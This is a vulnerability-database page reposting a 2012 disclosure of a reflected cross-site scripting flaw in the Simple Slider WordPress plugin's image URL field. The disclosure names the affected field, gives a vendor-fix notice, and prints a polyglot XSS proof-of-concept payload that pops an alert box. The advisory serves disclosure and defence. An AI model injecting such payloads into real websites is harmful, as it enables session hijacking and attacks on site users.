Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28835
HistoryDec 10, 2012 - 12:00 a.m.

XSS Vulnerability in Simple Slider Wordpress Plugin

2012-12-1000:00:00
vulners.com
16
JSON

#############################
Exploit Title : Simple Slider Plugin Cross-Site Scripting Vulnerabilities
Author: Aditya Balapure
home: http://adityabalapure.blogspot.in/
Date: 21/11/12
version: 1.0
software link: http://wordpress.org/extend/plugins/simple-slider

#############################
Simple Slider plugin description

Simple Slider Plugin for WordPress allows creation and management of simple image slideshows

##########################
XSS location

The simple Slider Plugin in Wordpress http://wordpress.org/extend/plugins/simple-slider/ has a Reflective XSS vulnerability in the New Image URL field.

Script Used-
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//–
> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

##########################
Vendor Notification

21/11/2012 to: -The vendor was notified and an updated version was released by the vendor.

http://wordpress.org/extend/plugins/simple-slider/changelog/

JSON